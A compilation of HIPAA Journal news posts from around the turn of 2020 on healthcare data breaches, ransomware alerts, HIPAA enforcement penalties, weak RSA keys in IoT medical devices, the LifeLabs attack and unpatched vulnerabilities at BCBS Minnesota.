Healthcare Cybersecurity

Healthcare Data Breaches Predicted to Cost Industry $4 Billion in 2020

Posted by HIPAA Journal

Healthcare industry data breaches are occurring more frequently than ever before. The healthcare data breach figures for 2019 have yet to be finalized, but so far 494 data breaches of more than 500 records have been reported to the HHS’ Office for Civil Rights and more than 41.11 million records were exposed, stolen, or impermissibly disclosed in 2019. That makes 2019 the worst ever year for healthcare data breaches and the second worst in terms of the number of breached healthcare records.

The healthcare industry now accounts for around four out of every five data breaches and 2020 looks set to be another record-breaking year. The cost to the healthcare industry from those breaches is expected to reach $4 billion in 2020.

The poor state of healthcare cybersecurity was highlighted by a survey of healthcare security professionals conducted in late 2019 by Black Book Market Research. The survey was conducted on 2,876 security professionals from 733 provider organizations to identify cybersecurity gaps, vulnerabilities, and deficiencies in the healthcare industry.

The survey revealed more than 93% of healthcare organizations experienced a data breach between Q3, 2016. 57% of surveyed healthcare providers experienced more than 5 breaches in that period. Even though there is a high risk of a data breach being suffered, investment in cybersecurity is nowhere near the level it needs to be.

“It is becoming increasingly difficult for hospitals to find the dollars to invest in an area that does not produce revenue,” said Doug Brown, founder of Black Book. According to 90% of hospital representatives surveyed, IT security budgets have remained level since 2016.”

The survey revealed hospital systems have increased their cybersecurity budgets to around 6% of their IT spend but spending on cybersecurity by physician organizations has decreased since 2018 and now stands at less than 1% of their IT budget.

When money is spent on cybersecurity, solutions are often purchased blindly or with little vision or discernment. The survey showed that between 2016 and 2018, 92% of data security purchase decisions were made by the C-suite without any users or affected department managers being involved in the purchasing decision.

Despite the threat of attack, 92% of healthcare organizations lack full time cybersecurity professionals and only 21% of hospitals said they had a dedicated security executive. Only 6% of those respondents said that individual was the Chief Information Security Officer (CISO). Physician groups are much less likely to have a CISO. Only 1.5% of physician groups with more than 10 clinicians said they had a dedicated CISO.

More CISOs and cybersecurity professionals are sorely needed, but it is unclear where those individuals will come from due to a nationwide shortage of skilled cybersecurity professionals. In the meantime, cybersecurity is having to be outsourced to managed service providers as a stop-gap measure.

Other key findings of the survey include:

  • 96% of IT professionals said threat actors are outpacing medical enterprises
  • More money is being spent on marketing to repair damaged reputations after a breach than is spent on combating the consequences of data breaches.
  • 35% of healthcare organizations did not scan for vulnerabilities before an attack
  • 87% of healthcare organizations have not had a cybersecurity drill with an incident response process
  • 40% of providers surveyed do not carry out measurable assessments of their cybersecurity status.
  • 26% of hospital respondents and 93% of physician organizations currently report they do not have an adequate solution to instantly detect and respond to an organizational attack.

The post Healthcare Data Breaches Predicted to Cost Industry $4 Billion in 2020 appeared first on HIPAA Journal.

FBI Issues Alert as Maze Ransomware Attacks Increase in the U.S.

Posted by HIPAA Journal

Last week, the Federal Bureau of Investigation (FBI) issued a flash alert warning private companies in the United States about the threat of attacks involving Maze ransomware. The warning came just a few days after the FBI issued an alert about two other ransomware variants, LockerGoga and MegaCortex.

The Maze ransomware TLP: Green warning is not intended for public distribution as it provides technical details about the attacks and indicators of compromise which can be used by private firms to prevent attacks. If published in the public domain, it could aid the attackers.

In the alert, victims of Maze ransomware attacks were urged to share information with the FBI as soon as possible to help its agents trace the attackers and bring them to justice.

Maze ransomware was first identified in early 2019, but it was not until November 2019 when the first attacks hit companies in the United States. Those attacks have been increasing in recent weeks.

When network access is gained, data is exfiltrated prior to file encryption. A ransom demand is then issued specific to the organization. The attackers claim they will supply the keys to decrypt files and will destroy all data they stole in the attack. The attackers warn their victims that if payment is not made before the deadline is reached, they will start publishing the stolen data.

Maze ransomware was used in a recent attack on the City of Pensacola. When the ransom was not paid the attackers started publishing the stolen data. In December, the Carrollton, GA-based wire and cabling firm, Southwire, was attacked with Maze ransomware. An 850 BTC ($6 million) ransom demand was issued for the keys to decrypt files. The attackers said they had stolen data and threatened to publish it if the ransom was not paid. When no payment was received, the attackers created a website with an Irish ISP and started publishing the data.

Southwire successfully obtained a court injunction in Ireland forcing the ISP to take down the website that was being used by the Maze gang to publish its data. That website is now offline. Southwire also filed a lawsuit against the hackers in federal court in Georgia. Southwire alleges violations of the U.S. Computer Fraud and Abuse Act and is seeking injunctive relief and damages. Since the attackers are unknown, the lawsuit was filed against ‘John Doe.’

According to CyberScoop, which obtained a copy of the FBI alert, the threat actors use a variety of methods to attack businesses, including malicious cryptocurrency websites, malspam and phishing campaigns impersonating government agencies and security vendors, and ransomware downloads via exploit kits such as Fallout.

The FBI has urged private companies in the United States to heed its warning and take steps to strengthen their defenses and address vulnerabilities. In the event of an attack, the FBI does not recommend paying the ransom as there is no guarantee that valid keys to decrypt data will be supplied or that the stolen data will be destroyed.

The post FBI Issues Alert as Maze Ransomware Attacks Increase in the U.S. appeared first on HIPAA Journal.

DHS Warns of Retaliatory Cyberattacks in Response to U.S. Drone Strike

Posted by HIPAA Journal

The U.S. Department of Homeland Security has issued a warning about retaliatory cyberattacks following the military action in Iraq in which Iran’s top general, Major General Qasem Soleimani, was killed in a done strike.

The U.S. Department of Defense issued a statement saying “General Soleimani was actively developing plans to attack American diplomats and service members in Iraq and throughout the region.” President Trump tweeted soon after the attack saying, “We took action last night to stop a war. We did not take action to start a war.”

Iran has condemned the attack and the country’s supreme leader, Ayatollah Ali Khamenei, has vowed to take “forceful revenge” on the United States. The U.S. State Department has advised all Americans in Iraq to leave the country over concerns for their safety and on Sunday, Iraqi MPs voted to expel all US troops from the country,

There are genuine fears of reprisal attacks from Iran and growing concern that those attacks will take place in cyberspace rather than on the ground. US companies, government agencies, and critical infrastructure could be targeted. Iran may have relatively limited military power, but highly destructive cyberattacks are well within Iran’s capabilities.

Threat actors with links to the Iranian government have long been conducting cyberattacks in the United States, but the nature of the attacks may well change. Iran has been developing a range of offensive cyber tools and has conducted destructive cyberattacks in the past. Notably, threat actors linked to Iran used the wiper malware Shamoon to attack the Saudi Arabian oil giant Aramco in 2012. Further wiper malware variants are understood to have also been developed which could be deployed against targets in the United States. Iran has also been linked to the SamSam ransomware attacks, including the attack on the City of Atlanta.

Acting secretary of the DHS, Chad Wolf, said no specific, credible threats against the United States have been identified so far. The DHS will continue to monitor the situation and will be working with local, state, and federal partners to ensure the safety of all Americans.

It is not known if or when any attacks will take place, but local, state, and federal leaders have been urged to take the necessary precautions. Director of the DHS’ Cybersecurity and Infrastructure Security Agency, Chris Krebs, said on Twitter, “Bottom line: time to brush up on Iranian [Tactics, Techniques and Procedures] and pay close attention to your critical systems, particularly ICS. Make sure you’re also watching third party accesses!”

Krebs also referenced an earlier warning that he issued in June, in which he said, “CISA is aware of a recent rise in malicious cyber activity directed at United States industries and government agencies by Iranian regime actors and proxies. We will continue to work with our intelligence community and cybersecurity partners to monitor Iranian cyber activity, share information, and take steps to keep America and our allies safe.”

The post DHS Warns of Retaliatory Cyberattacks in Response to U.S. Drone Strike appeared first on HIPAA Journal.

HIPAA Enforcement in 2019

Posted by HIPAA Journal

It has been another year of heavy enforcement of HIPAA compliance. HIPAA enforcement in 2019 by the Department of Health and Human Services’ Office for Civil Right (OCR) has resulted in 10 financial penalties. $12,274,000 has been paid to OCR in 2019 to resolve HIPAA violation cases.

2019 saw one civil monetary penalty issued and settlements were reached with 9 entities, one fewer than 2018. In 2019, the average financial penalty was $1,022,833.

HIPAA Enforcement in 2019 by the HHS' Office for Civil Rights

 

Particularly egregious violations will attract financial penalties, but some of the HIPAA settlements in 2019 provide insights into OCRs preferred method of dealing with noncompliance. Even when HIPAA violations are discovered, OCR prefers to settle cases through voluntary compliance and by providing technical assistance. When technical assistance is provided and covered entities fail to act on OCR’s advice, financial penalties are likely to be issued.

This was made clear in two of the most recent HIPAA enforcement actions. OCR launched compliance investigations into two covered entities after being notified about data breaches. OCR discovered in both cases that HIPAA Rules had been violated. OCR chose to provide technical assistance to both entities rather than issue financial penalties, but the covered entities failed to act on the guidance and a financial penalty was imposed.

Sentara Hospitals disagreed with the guidance provided by OCR and refused to update its breach report to reflect the actual number of patients affected. West Georgia Ambulance was issued with technical guidance and failed to take sufficient steps to address the areas of noncompliance identified by OCR.

If you are told by OCR that your interpretation of HIPAA is incorrect, or are otherwise issued with technical guidance, it pays to act on that guidance quickly. Refusing to take corrective action is a sure-fire way to guarantee a financial penalty, attract negative publicity, and still be required to change policies and procedures in line with the guidance.

There were two important HIPAA enforcement updates in 2019. OCR adopted a new interpretation of the Health Information Technology for Economic and Clinical Health (HITECH) Act’s requirements for HIPAA penalties and a new enforcement initiative was launched.

The HITECH Act of 2009 called for an increase in the penalties for HIPAA violations. On January 25, 2013, the HHS implemented an interim final rule and adopted a new penalty structure. At the time it was thought that there were inconsistencies in the language of the HITECH Act with respect to the penalty amounts. OCR determined that the most logical reading of the HITECH Act requirements was to apply the same maximum penalty of $1,500,000 per violation category, per calendar year to all four penalty tiers.

In April 2019, OCR issued a notice of enforcement discretion regarding the penalties. A review of the language of the HITECH Act led to a reduction in the maximum penalties in three of the four tiers. The maximum penalties for HIPAA violations were changed to $25,000, $100,000, and $250,000 for penalty tiers, 1, 2, and 3. (subject to inflationary increases).

2019 saw the launch of a new HIPAA Right of Access enforcement initiative targeting organizations who were overcharging patients for copies of their medical records and were not providing copies of medical records in a timely manner in the format requested by the patient.

The extent of noncompliance was highlighted by a study conducted by Citizen Health, which found that 51% of healthcare organizations were not fully compliant with the HIPAA Right of Access. Delays providing copies of medical records, refusals to send patients’ PHI to their nominated representatives or their chosen health apps, not providing a copy of medical records in an electronic format, and overcharging for copies of health records are all common HIPAA Right of Access failures.

The two HIPAA Right of Action settlements reached so far under OCR’s enforcement initiative have both resulted in $85,000 fines. With these enforcement actions OCR is sending a clear message to healthcare providers that noncompliance with the HIPAA Right of Access will not be tolerated.

Right of Access violations aside, the same areas of noncompliance continue to attract financial penalties, especially the failure to conduct a comprehensive, organization-wide risk analysis. 2019 also saw an increase in the number of cited violations of the HIPAA Breach Notification Rule.

HIPAA Compliance Issues Cited in 2019 Enforcement Actions

Noncompliance Issue Number of Cases
Risk Analysis 5
Breach Notifications 3
Access Controls 2
Business Associate Agreements 2
HIPAA Right of Access 2
Security Rule Policies and Procedures 2
Device and Media Controls 1
Failure to Respond to a Security Incident 1
Information System Activity Monitoring 1
No Encryption 1
Notices of Privacy Practices 1
Privacy Rule Policies and Procedures 1
Risk Management 1
Security Awareness Training for Employees 1
Social Media Disclosures 1

OCR’s HIPAA enforcement in 2019 also clearly demonstrated that a data breach does not have occurred for a compliance investigation to be launched. OCR investigates all breaches of 500 or more records to determine whether noncompliance contributed to the cause of a breach, but complaints can also result in an investigation and compliance review. That was the case with both enforcement actions under the HIPAA Right of Access initiative.

 

The post HIPAA Enforcement in 2019 appeared first on HIPAA Journal.

FBI Issues Warning Following Spate of LockerGaga and MegaCortex Ransomware Attacks

Posted by HIPAA Journal

The FBI has issued a TLP:Amber alert in response to a spate of cyberattacks involving the ransomware variants LockerGaga and MegaCortex. The threat actors using these ransomware variants have been targeting large enterprises and organizations and typically deploy the ransomware several months after a network has been compromised.

LockerGaga was first detected in January 2019 and MegaCortex ransomware first appeared in May 2019. Both ransomware variants exhibit similar IoCs and have similar C2 infrastructure and are both used in highly targeted attacks on large corporate networks.

LockerGaga was used in the ransomware attacks on the U.S. chemical companies Hexion and Momentive, the aluminum and energy company Norsk Hydro, and the engineering consulting firm, Altran Technologies. MegaCortex ransomware was used in the attacks on the accounting software firm Wolters Kluwer and the cloud hosting firm iNSYNQ, to name but a few. The threat actors are careful, methodical, and attempt to cause maximum damage to increase the probability that their victim’s will pay. The ransom demands are often of the order of hundreds of thousands of dollars or more.

The initial compromise is achieved through a variety of methods including the exploitation of unpatched vulnerabilities, phishing attacks, SQL injection, brute force tactics on RDP, and the use of stolen credentials. Once compromised, the attackers run batch files to stop processes and services used by security solutions to ensure their presence is not detected. The attackers move laterally to compromise as many devices as possible using a penetration testing tool named Cobalt Strike, living-of-the-land Windows binaries, and legitimate software tools such as Mimikatz. A beacon is added to each compromised device on the network, which is used to execute PowerShell scripts, escalate privileges, and spawn a new session to act as a listener on the victim’s system, according to the FBI warning, as reported by Bleeping Computer which obtained a copy of the alert.

In contrast to many other threat actors who deploy ransomware soon after a system is compromised, the threat actors behind these attacks often wait several months before the ransomware encryption routine is triggered. It is unclear what the threat actors do during that time, but it is likely the time is used to steal sensitive data. The ransomware is deployed in the final stage of the attack once all useful data has been obtained from the victims.

The advice offered by the FBI to improve defenses is standard for preventing ransomware and other cyberattacks. Cybersecurity best practices should be followed, including backing up data regularly; storing backup copies on non-networked devices; testing backups to ensure file recovery is possible; setting strong passwords; patching promptly; enabling multi-factor authentication, especially on admin accounts; ensuring RDP servers can only be accessed via a VPN; disabling SMBv1; and to scan for open ports and block them to prevent them from being accessible.

The FBI also recommends auditing the creation of new accounts and monitoring Active Directory for changes to authorized users; enabling PowerShell logging and monitoring for unusual commands, including the execution of Base64 encoded PowerShell; and ensuring only the latest version of PowerShell is installed.

The post FBI Issues Warning Following Spate of LockerGaga and MegaCortex Ransomware Attacks appeared first on HIPAA Journal.

November 2019 Healthcare Data Breach Report

Posted by HIPAA Journal

In November 2019, 33 healthcare data breaches of 500 or more records were reported to the Department of Health and Human Services’ Office for Civil Rights (OCR). That represents a 36.5% decrease in reported breaches from October – The worst ever month for healthcare data breaches since OCR started listing breaches on its website in October 2009. The fall in breaches is certainly good news, but data breaches are still occurring at a rate of more than one a day.

600,877 healthcare records were exposed, impermissibly disclosed, or stolen in November. That represents a 9.2% decrease in breached healthcare records from October, but the average breach size increased by 30.1% to 18,208 records in November.

Largest Healthcare Data Breaches in November 2019

Name of Covered Entity Covered Entity Type Individuals Affected Type of Breach Location of Breached PHI
Ivy Rehab Network, Inc. and its affiliated companies Healthcare Provider 125000 Hacking/IT Incident Email
Solara Medical Supplies, LLC Healthcare Provider 114007 Hacking/IT Incident Email
Saint Francis Medical Center Healthcare Provider 107054 Hacking/IT Incident Electronic Medical Record, Network Server
Southeastern Minnesota Oral & Maxillofacial Surgery Healthcare Provider 80000 Hacking/IT Incident Network Server
Elizabeth Family Health Healthcare Provider 28375 Theft Paper/Films
The Brooklyn Hospital Center Healthcare Provider 26312 Hacking/IT Incident Network Server
Utah Valley Eye Center Healthcare Provider 20418 Hacking/IT Incident Desktop Computer
Loudoun Medical Group d/b/a Comprehensive Sleep Care Center (“CSCC”) Healthcare Provider 15575 Hacking/IT Incident Email
Choice Cancer Care Healthcare Provider 14673 Hacking/IT Incident Email
Arizona Dental Insurance Services, Inc. d.b.a. Delta Dental of Arizona Health Plan 12886 Hacking/IT Incident Email

Causes of Healthcare Data Breaches in November 2019

Hacking/IT incidents dominated November’s breach reports and accounted for 63.6% of data breaches reported in November and 90.75% of the breached records (545,293). The average breach size was 25,966 records and the median breach size was 3,977 records.

There were 7 unauthorized access/disclosure breaches reported in November involving 16,586 healthcare records. The mean breach size was 2,369 records and the median breach size was 996 records.

There were 4 incidents involving the theft of 38,998 individuals’ protected health information. Two of the incidents involved electronic devices and two involved paper records. The mean breach size was 7,799 records and the median breach size was 3,237 records.

Phishing continues to be the most common cause of healthcare data breaches. 17 of the healthcare data breaches reported in November involved PHI stored in email accounts. The majority of those breaches were due to phishing attacks.

November 2019 Healthcare Data Breaches by Covered Entity Type

There were 28 healthcare provider data breaches reported in November and four breaches were reported by health plans. It was a good month for business associates, with only one breach reported, although a further two breaches had some business associate involvement.

 

November 2019 Healthcare Data Breaches by State

Data breaches were reported by covered entities in 19 states. California was the worst affected with 4 breaches, followed by Illinois, Missouri, New York, and Texas with three breaches each. Two breaches were reported by covered entities in Florida, North Carolina, and Pennsylvania, and there was one reported beach in each of Alaska, Arizona, Colorado, Connecticut, Indiana, Maryland, Michigan, Minnesota, Nebraska, Utah, and Virginia.

HIPAA Enforcement in November 2019

There were three financial penalties imposed on HIPAA-covered entities in November to resolve HIPAA violations.

University of Rochester Medical Center (URMC) settled its HIPAA violation case with OCR for $3,000,000. OCR launched an investigation after receiving two notifications about breaches due to lost or stolen devices. OCR investigated URMC in 2010 after the first device was lost and provided technical assistance. At the time, URMC recognized the high risk of storing ePHI on devices and the need for encryption, yet this was not implemented, and unencrypted portable electronic devices continued to be used. When OCR investigated the subsequent theft of a laptop computer, its investigators found URMC had failed to conduct an organization-wide risk analysis, risks had not been reduced to a reasonable and appropriate level, and URMC had not implemented appropriate device media controls.

Sentara Hospitals agreed to settle its HIPAA violation case with OCR for $2,175,000. OCR launched a compliance investigation in response to a complaint from a patient in April 2017. The patient had received a bill from Sentara containing another patient’s protected health information. Sentara Hospitals reported the breach as affecting 8 individuals, but OCR found that 577 letters had been misdirected to 16,342 different guarantors. Sentara Hospitals refused to update its breach report with the new total. OCR also found Sentara Hospitals had failed to enter into a business associate agreement with one of its vendors.

A substantial financial penalty was also imposed on The Texas Department of Aging and Disability Services (DADS). DADS had reported a breach of 6,617 patients’ ePHI to OCR in 2015. An error in a web application allowed ePHI to be accessed over the internet by individuals unauthorized to view the data. ePHI had been exposed for around 8 years. OCR investigated and found that DADS had failed to conduct an organization-wide risk analysis, there was a lack of access controls, and DADS failed to monitor information system activity. DADS settled the HIPAA violation case and paid a penalty of $1.6 million.

The post November 2019 Healthcare Data Breach Report appeared first on HIPAA Journal.

Poor RSA Encryption Implementation Opens Door to Attacks on Medical Devices and Implants

Posted by HIPAA Journal

Encryption renders data inaccessible to unauthorized individuals, provided the private key to decrypt data is not compromised and strong encryption is used.

Not all algorithms provide the same level of protection. The strength of encryption relies on the length of the key. The longer the key, the more computational power is required to break the encryption. When strong encryption is used, the computing power and time required to break the encryption renders the data virtually inaccessible.

DES was once considered a strong form of encryption but the computing power now available makes cracking the encryption possible even on relatively inexpensive computers. DES used 56-bit keys, which were fine in the 1970’s, but today the keys are nowhere near long enough. Strong encryption today is generally considered to require 256-bit keys, such as those generated by the AES algorithm. With AES-256, for the time being at least, sensitive data can be adequately secured. Providing the key is not disclosed, encrypted data cannot be accessed.

RSA is an alternative encryption standard that is commonly used to protect sensitive data. It uses an asymmetric cryptographic algorithm using two keys – A private key and a public key. The public key can be given to anyone, as it cannot be used on its own to decrypt data. For that the private key is also required.

The keys are generated by multiplying two random prime numbers. RSA keys are long and cannot easily be guessed or brute forced due to the level of computing power required. However, if errors are made implementing RSA encryption, keys can easily be cracked.

One of the problems that can arise is when RSA keys are not encrypted using truly random prime numbers. Errors in randomness weakens the encryption. A recent analysis of RSA certificates by Keyfactor has shown that in many IoT devices, the factors used to generate the keys are not entirely random, which makes it much easier to deduce the private key.

In such cases, a considerable amount of computing power is still required, but not enough to make cracking the encryption sufficiently difficult. According to Keyfactor, all it would take is around $3,000 of compute time on a single Azure virtual machine to crack these weak keys. At such a low cost, threat actors may find it well worth the investment.

Using a scalable GCD algorithm on their Azure VM, the researchers collected 175 million RSA certificates from the internet. 75 million of those keys were actively used to encrypt traffic and 100 million were publicly available keys. Keyfactor’s analysis identified 435,000 RSA certificates that shared the same factor. That equates to around 1 in 172 RSA certificates. Keyfactor was able to break all 435,000 certificates for less than $3,000 in Azure compute time.

Shared factors are mostly used in lightweight IoT devices. This is because they do not have sufficient entropy to generate truly random numbers as they lack the necessary processing power. The random numbers used are therefore predictable.  Discover the two prime numbers used to generate the key and the private key can be derived.

“Lightweight IoT devices are particularly prone to being in low entropy states due to the lack of input data they might receive, as well as the challenge of incorporating hardware-based random number generation economically,” explained Keyfactor. “Keys generated by lightweight IoT devices are therefore at risk of not being sufficiently random, increasing the chance that two keys share a factor and allow the key to be broken.”

One example they found involved an 8,192-bit RSA key. That key was extremely large, so it should not have been possible to guess it no matter how much time was devoted to the task. Yet guess that key they did. The length of the key was fine, but since the factor used was not entirely random, the length of the key was irrelevant.

A threat actor with the derived private key cannot be distinguished by the genuine private key holder, which opens the door to man-in-the-middle attacks, data tampering, and data theft.

This has major implications for a wide range of industries that use large numbers of IoT devices. Healthcare for example. In healthcare, many medical devices and implants have low entropy, so the encryption could be cracked and data obtained for a relatively small investment.

“The findings are alarming. The research finds inordinate rates of compromise impacting IoT devices with design constraints and limited entropy,” Keyfactor CTO Ted Shorter said. “These devices could include cars, medical implants and other critical devices, that if compromised, could result in life-impacting harm.”

Making existing IoT devices more secure is a major challenge. It may not be possible to patch affected IoT devices and if they lack sufficient processing power, they will remain insecure. The solution is to build sufficient entropy into the devices to ensure truly random factors are used to generate strong RSA keys.

The post Poor RSA Encryption Implementation Opens Door to Attacks on Medical Devices and Implants appeared first on HIPAA Journal.

15 Million Customers Potentially Impacted by Ransomware Attack on Large Canadian Medical Testing Company

Posted by HIPAA Journal

A major data breach has been reported by one of Canada’s largest medical testing and diagnostics companies. Toronto-based LifeLabs said hackers have potentially gained access to the personal and health information of up to 15 million customers, most of whom are in British Columbia and Ontario. The number of people potentially affected makes this one of the largest healthcare ransomware attacks to date. The privacy commissioners in both provinces said the scale of the attack “extremely troubling.”

After gaining access to its systems, the attackers deployed ransomware and encrypted an extensive amount of customer data. The cyberattack is still under investigation, so it is unclear what, if any, data has been stolen. It has been confirmed that the attackers gained access to parts of the system that contained the test results of around 85,000 Ontarians. The test results were from 2016 and earlier. No evidence has been found to suggest more recent test results, or medical test results from customers in other areas, have been compromised.

Some of those test results include highly sensitive health information that could potentially be used for blackmail. Other sensitive data potentially accessed includes names, email addresses, health card numbers, dates of birth, usernames, and passwords. To date, it appears that the compromised information has not been misused and the data does not appear to have been disclosed online. Based on the initial findings of the investigation, the risk to customers is believed to be low.

It is unclear whether LifeLabs had viable backups to restore the data, but the decision was taken to pay the ransom. The amount of the ransom has not been publicly disclosed. “We wanted to get the data back,” said LifeLabs chief executive Charles Brown. “We thought it was the smart thing to do because it was just in the best interests of our customers.”

Cybersecurity and computer forensics experts were engaged to secure its systems and determine the full scope of the attack. It may take some time to discover whether any customer data has been stolen by the attackers.

The attack is believed to have started on or before November 1, 2019, but the cyberattack was only disclosed to the public on December 17, 2019. Affected individuals are now being notified and have been offered one year of complimentary credit monitoring and identity theft protection services.

The post 15 Million Customers Potentially Impacted by Ransomware Attack on Large Canadian Medical Testing Company appeared first on HIPAA Journal.

Blue Cross Blue Shield of Minnesota Starts Correcting 200,000 Critical and Severe Vulnerabilities

Posted by HIPAA Journal

Blue Cross Blue Shield of Minnesota, the largest health insurer in the state, is now taking steps to fix around 200,000 unaddressed vulnerabilities on its servers that, in some cases, are more than a decade old.

In August 2018, Tom Yardic, a cybersecurity engineer at BCBS Minnesota discovered patches were not being applied on its servers, even though the vulnerabilities were rated critical or severe. The engineer met with executives at BCBS Minnesota to raise the alarm, yet no action appeared to be taken.

Around a month later, Yardic alerted the BCBS Minnesota board of trustees as a last resort to get action taken to address the flaws, according to a recent report in the Star Tribune.

According to the newspaper report, evidence was obtained that revealed vulnerabilities had not been addressed for many years. There were around 200,000 critical or severe vulnerabilities that had not been addressed on approximately 2,000 servers. Around 44% of the vulnerabilities were more than 3 years old and approximately 12% of the flaws dated back 10 or more years.

Approximately 3.9 million individuals are insured by BCBS Minnesota. The failure to correct the vulnerabilities in a reasonable time frame has placed their sensitive information at risk.

The Star Tribune spoke with officials at BCBS Minnesota who confirmed that work is now underway to correct the flaws and said it is trying to correct as many of the flaws as possible before the end of the year. According to the Star Tribune, “Minnesota Blue Cross did not dispute the accuracy of the number of past vulnerabilities” and said that the number of unaddressed vulnerabilities is now far lower and is much lower on workstations.

It is not surprising that a cybersecurity engineer has taken steps to get the flaws corrected. It is surprising that it took so long, especially following the cyberattacks on Anthem Inc., Premera Blue Cross, and Excellus BCBS in 2015 that resulted in the theft of the protected health information of more than 99.8 million Americans.

Surprisingly, given the sheer number of unaddressed vulnerabilities, BCBS Minnesota has never reported a data breach of its own systems since the HHS Office for Civil Rights started publishing summaries of data breaches on its breach portal in 2009.

The post Blue Cross Blue Shield of Minnesota Starts Correcting 200,000 Critical and Severe Vulnerabilities appeared first on HIPAA Journal.